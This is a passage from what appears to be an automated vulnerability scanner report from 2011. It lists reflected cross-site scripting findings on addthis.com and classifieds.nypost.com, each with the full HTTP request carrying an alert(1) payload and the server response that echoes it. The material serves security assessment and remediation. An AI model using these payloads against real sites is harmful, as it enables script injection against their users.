The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed9c6"-alert(1)-"bc9b8de2ed6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phped9c6"-alert(1)-"bc9b8de2ed6 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 05:31:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ijgl22u3d4netlsb9jif12leu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1497
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phped9c6"-alert(1)-"bc9b8de2ed6";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.114. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14ca5<script>alert(1)</script>f3ce7029187 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php14ca5<script>alert(1)</script>f3ce7029187 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 05:31:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=edlikb5dctrbqo0f3e0jmjc3l0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1523
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php14ca5<script>alert(1)</script>f3ce7029187</strong>
...[SNIP]...

1.115. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55ee9"-alert(1)-"40f54fd3f8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/55ee9"-alert(1)-"40f54fd3f8d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 93707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/55ee9"-alert(1)-"40f54fd3f8d";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.116. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 181e9"style%3d"x%3aexpression(alert(1))"e7f1e4a7067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 181e9"style="x:expression(alert(1))"e7f1e4a7067 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=starbucks&url=http://www.starbucks.com/sm/181e9"style%3d"x%3aexpression(alert(1))"e7f1e4a7067ooth HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.starbucks.com/sm/181e9"style="x:expression(alert(1))"e7f1e4a7067ooth" />
...[SNIP]...

1.117. http://www.addthis.com/bookmark.php [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4656"style%3d"x%3aexpression(alert(1))"5ee5d2cdcc7 was submitted in the url parameter. This input was echoed as c4656"style="x:expression(alert(1))"5ee5d2cdcc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=starbucks&url=http://www.starbucks.com/smoothc4656"style%3d"x%3aexpression(alert(1))"5ee5d2cdcc7 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.starbucks.com/smoothc4656"style="x:expression(alert(1))"5ee5d2cdcc7" />
...[SNIP]...

1.118. http://www.addthis.com/bookmark.php [username parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a651a"%20style%3dx%3aexpression(alert(1))%209a725fd9f7d was submitted in the username parameter. This input was echoed as a651a\" style=x:expression(alert(1)) 9a725fd9f7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=starbucksa651a"%20style%3dx%3aexpression(alert(1))%209a725fd9f7d&url=http://www.starbucks.com/smooth HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="starbucksa651a\" style=x:expression(alert(1)) 9a725fd9f7d" />
...[SNIP]...

1.119. http://www.addthis.com/bookmark.php [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e047c"style%3d"x%3aexpression(alert(1))"02571eca9de was submitted in the v parameter. This input was echoed as e047c"style="x:expression(alert(1))"02571eca9de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250e047c"style%3d"x%3aexpression(alert(1))"02571eca9de&username=starbucks&url=http://www.starbucks.com/smooth HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-250e047c"style="x:expression(alert(1))"02571eca9de" />
...[SNIP]...

1.120. http://www.addthis.com/help/api-spec [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f44e"-alert(1)-"ddd92bfa15c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1f44e"-alert(1)-"ddd92bfa15c/api-spec HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:29:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=67apvckijqd1n3dakhe47gj2v3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1491
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/1f44e"-alert(1)-"ddd92bfa15c/api-spec";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker =
...[SNIP]...

1.121. http://www.addthis.com/help/api-spec [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca3d4<script>alert(1)</script>6cf201a68e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca3d4<script>alert(1)</script>6cf201a68e3/api-spec HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:29:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=qhq4ppcjjjl2bsbdltnemiu286; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1517
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>ca3d4<script>alert(1)</script>6cf201a68e3/api-spec</strong>
...[SNIP]...

1.122. http://www.addthis.com/help/api-spec [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ae90"-alert(1)-"75ea719bdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help/3ae90"-alert(1)-"75ea719bdbc HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 02:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=3opilfmv6jbpkpmnnl0eimkdo3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mouser=cl; expires=Thu, 10-Mar-2011 02:29:07 GMT; path=/
Vary: Accept-Encoding
imagetoolbar: no
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 13227

   
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>AddThis - He
...[SNIP]...
<script type="text/javascript">
var u = "/404/help/3ae90"-alert(1)-"75ea719bdbc";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.123. http://www.classifieds.nypost.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b59"><script>alert(1)</script>77953b7e1b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?56b59"><script>alert(1)</script>77953b7e1b6=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:31:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=255a3ec63add34e23ab755c3f6c4629c; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=a970c04805fa35927fbfe1ae2885bae2; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BMUYxMzAyMDRENTBBQjA0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjI5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/?56b59"><script>alert(1)</script>77953b7e1b6=1" />
...[SNIP]...

1.124. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17416"-alert(1)-"93c06369d93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing17416"-alert(1)-"93c06369d93/rent/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=b0fb135493699c46be397d18ce480f53; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=b67f3e84c70532592b61bdc82670e8ff; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BRDA3RTVDRTRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing17416"-alert(1)-"93c06369d93/rent/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.125. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 787a0"><script>alert(1)</script>939c43a6910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing787a0"><script>alert(1)</script>939c43a6910/rent/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=09aa001fc39530364a26f37b52cd4f0f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=0c409366fcf638731c51c1f5013fd790; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1ERDk0OUEwNjRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing787a0"><script>alert(1)</script>939c43a6910/rent/" />
...[SNIP]...

1.126. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 628b8"-alert(1)-"959f4c4a5eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/rent628b8"-alert(1)-"959f4c4a5eb/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=dab3bbbe5cc49116e0ff796dec2beddb; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=c92e4eb35e8ac0c1594a8106715c765e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BNDE3NTMxNTRENTBBQjMz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzOTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/rent628b8"-alert(1)-"959f4c4a5eb/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.127. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d45"><script>alert(1)</script>91ce77e36d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rentf5d45"><script>alert(1)</script>91ce77e36d2/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=f71e3c13c8b2a4cbb7187684e907c962; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=1ce0df756b7d35d426f19249f48a1e8e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BNTBFNDJDRTRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rentf5d45"><script>alert(1)</script>91ce77e36d2/" />
...[SNIP]...

1.128. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98452"-alert(1)-"777efafcfa1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing98452"-alert(1)-"777efafcfa1/rent/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
